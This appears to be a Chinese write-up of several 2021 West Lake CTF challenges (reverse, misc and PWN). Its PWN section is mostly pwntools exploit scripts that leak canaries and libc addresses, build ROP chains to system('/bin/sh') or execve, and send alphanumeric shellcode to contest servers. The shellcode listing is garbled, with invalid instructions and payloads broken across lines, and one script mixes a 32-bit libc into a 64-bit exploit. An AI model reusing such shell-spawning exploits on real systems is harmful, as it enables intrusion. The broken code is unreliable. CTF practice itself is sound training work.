0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC,
0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98,
0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED,
0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8,
0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04,
0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8,
0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4,
0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9,
0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72,
0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62,
0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA,
0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A,
0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3,
0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84,
0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F,
0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1,
0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF,
0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB,
0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1,
0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F };
char c[] = {0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB,
0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39,
0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39,
0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79 };
int goal[40] = {-1};
for (int i = 0; i < 40; i++) {for (int j = 0; j < 256;j++) {if (c[i] == data[j]) {goal[i] = j;
}
}
}
v6[0] = 128;
v6[1] = 64;
v6[2] = 32;
v6[3] = 16;
v6[4] = 8;
v6[5] = 4;
v6[6] = 2;
v6[7] = 1;
for (i = 0; i < 40; i += 8)
{for (j = 0; j < 8; ++j)
{for (int k = 0; k < 8; k++) {if (goal[i + j] & (v6[j] << (8 - (k - j) % 8u))) {Str[i + k] |= v6[j];
}
if (goal[i + j] & (v6[j] >> ((k - j) % 8u))) {Str[i + k] |= v6[j];
}
}
}
}
cout << Str << endl;
return 0;
}
这里的data和c是直接从程序里拿出来的数组,运行得到flag:
Q5la5_3KChtem6_HYHk_NlHhNZz73aCZeK05II96
虚假的粉丝
解题思路:
用正则 “U…S”搜f里面的那一堆文件,
4157,1118,40,得到 UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS,base64+百分号
解码,得到key:Al4N_wAlK3R,再用里面的5315 文件就是字符画 即可看到flag。
exp.py
import re
import base64
path = "H:\CTF\西湖论剑·2021中国杭州网络安全技能大赛\REVERSE\虚假的粉丝\\f\\ASCIIfaded "
US = re.compile("U......................................S", re.S)
for i in range(1, 5317):
name = str(i).zfill(4) + ".txt"
with open(path + name, "r") as f:
b = f.read()
items = re.findall(US, b)
if items != []:
print(name, items)
print(b)
key =
base64.b64decode("UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNSWM==").decode().sp
lit("20")[-1]
k = 0
print("key is here:",key)
with open(path + "5315.txt", "r") as f:
b = f.read()
for i in b:
if k > 10:
k = 0
print(chr(ord(i) ^ ord(key[k])), end="")
k += 1
不难看出flag为:A_TrUe_AW_f4ns
PWN
string _go
例行检查:
IDA打开发现没有后门函数字符等,考虑泄露canary得值和libc基址,接着查找system binsh在libc
里面的地址。
exp.py
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#p = process('./string_go')
p = remote('82.157.20.104',28100)
elf=ELF('./string_go')
libc=ELF('./libc-2.27.so')
p.sendlineafter('>>> ','1+2')
p.sendlineafter('>>> ','-1')
p.sendlineafter('>>> ','a'*0x8)
p.sendlineafter('>>> ','1')
p.recv(0x28)
addr=u64(p.recv(8))-0x730157
p.recv(8)
canary=u64(p.recv(8))
system=addr+libc.symbols['system']
binsh=addr+libc.search('/bin/sh').next()
payload =
('a'*0x18+p64(canary)+p64(0)*3+p64(addr+libc.search(asm('ret')).next())+p64(
addr+libc.search(asm('pop rdi\nret')).next())+p64(binsh)+p64(system))
p.sendline(payload)
p.interactive()
blind
检查:
64位的架构并且开启了NX,所以我们没办法传shellcode。我们IDA打开分析一下。看一下main函 数:
很明显的栈溢出,我们看一下stack:
50个字节。
我们shift F12看一下是否有敏感的system binsh等这些可获取系统权限的字符
依旧没有。所以我们首先得考虑泄露got表内libc的基址。 然后找到libc内system和binsh的地址, 即可getshell。在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找 到每一个寄存器对应的 gadgets。
exp:
from pwn import *
context.log_level = "debug"
#p = process("./blind")
p = remote("82.157.6.165",22700)
elf = ELF("./blind")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
def gadget(p1, p2, j2, a1 = 0x0, a2 = 0x0, a3 = 0x0):
payload = p64(p1)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(j2)
payload += p64(a3)
payload += p64(a2)
payload += p64(a1)
payload += p64(p2)
payload += 'A' * 56
return payload
pop_rdi = 0x00000000004007c3
pop_rsi_r15 = 0x00000000004007c1
payload = "a" * 0x58
payload += gadget(0x4007BA,0x4007A0,elf.got["read"],0,elf.got["alarm"],1)
payload += gadget(0x4007BA,0x4007A0,elf.got["read"],0,0x601088,0x3b)
payload += gadget(0x4007BA,0x4007A0,elf.got["alarm"],0x601088,0,0)
payload += (0x500 - len(payload)) * "\x00"
p.send(payload)
p.send("\xd5")
p.send("/bin/sh\x00" + "a" * (0x3b-8))
p.interactive()
远程:
code_project
检查:
啥保护都没开,那就编写shellcode直接打了;
exp:
from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
#p = process('./code_project')
p = remote('82.157.31.181',58400)
shellcode = '''
push 1
pop rdi
push 0x1
pop rdx
mov esi, 0x1010101
xor esi, 0x1611181
push 0x1601101
pop r14
xor r14, 0x1010101
pop 0x1011101
pop r15
xor r 15,0x1010101
search:
add r14, r15 /*r14: addr*/
mov [rsi], r14
mov [rsi+8], r15
push SYS_writev
pop rax
syscall
jmp search
'''
payload=
("Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G032x0Z020h3V0
11k01034q5n4r0G0Q000Y0j2A0Q010r0j084t4X050s010F0X0P2A01012x0o2C4s4v010")
p.sendline(payload)
p.interactive()
远程:
2021西湖论剑网络安全大赛部分WP相关推荐
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代...
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代
2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...
- 2021西湖论剑wp
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test ...
- 首届“网刃杯”网络安全大赛部分WP
这是之前打比赛写的WP,供大家参考 藏在S7里的秘密 1.修复流量包 下载流量包打开后发现提示错报 The file"S7.pcap" isn't a capture file i ...
- 2021宁波市第四届网络安全大赛(练习平台)RSA部分
挺久没有做过CTF了,明天就要打比赛了,临时抱佛脚,撸两道rsa,找找手感. 公钥文件泄露 题目给了两个文件:pub.key和flag.enc: pub.key -----BEGIN PUBLIC ...
- 2021 西湖论剑 pwn blind
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall. 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", ...
- 第三届上海大学生网络安全大赛 - 登机牌WP
登机牌 先修复上面的二维码 中间的可不要进行修复,不妨碍 ,你可以去看看自己微信的二维码是不是中间有头像也能扫出来? 扯多了..... 扫描出来,提示进行分离,可以看到里面有两个文件 直接将图片丢尽0 ...
- 2021年江西省网络安全大赛初赛MISC:extractall(循环解压+斐波那契脑洞)
目录 解题思路 总结 解题思路 在附件里面的文件长这样: 首先点开hint.txt 发现,直接告诉了解压包密码是前一个解压包的名字. (这句话用南昌话说更带味) 解压之后,发现还是有压缩包,于是这可能 ...
- WP-2021西湖论剑
2021西湖论剑-wp 前言 全靠大佬打,我是划水的. 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FI ...
- 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑...
近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...
最新文章
- 打造自己的数据访问层(二)
- html5列表去掉符号,从Python字符串中删除不在允许列表中的HTML标记
- 转载:JAVA 操作 Ant API
- 高仿带感魔性病毒源码+成品(最近很火的)
- 马哥学习李洋个人笔记之-----正则表达式
- python爬虫库教程_Python爬虫Selenium库详细教程
- 如何自己找数据分析项目来做?
- 如何在Eclipse中如何自动添加注释和自定义注释风格
- linux脚本两个分号,Linux Shell中各种分号和括号的用法总结
- 面向初学者的 40 多个 Python 项目——开始编写 Python 代码的简单想法
- 如何打造极速F1赛事?乐视云用六路信号还原比赛现场
- ARM 37 个通用寄存器详解
- 互联网查询信用报告,为什么提示“无法进行注册”?
- PowerDesigner16.7 安装与配置
- 怎么将ts文件合成一个文件
- 多变量线性回归(机器学习笔记三)
- 计网实验c/c++、网络嗅探器的设计与实现
- PHP环境搭建(phpStudy)与集成开发工具(phpStorm)的安装
- PPT光效属于计算机几级,PPT高大上的秘密,只有一个字:光!
- 目标检测论文解读复现之十七:融合注意力机制的YOLOv5口罩检测算法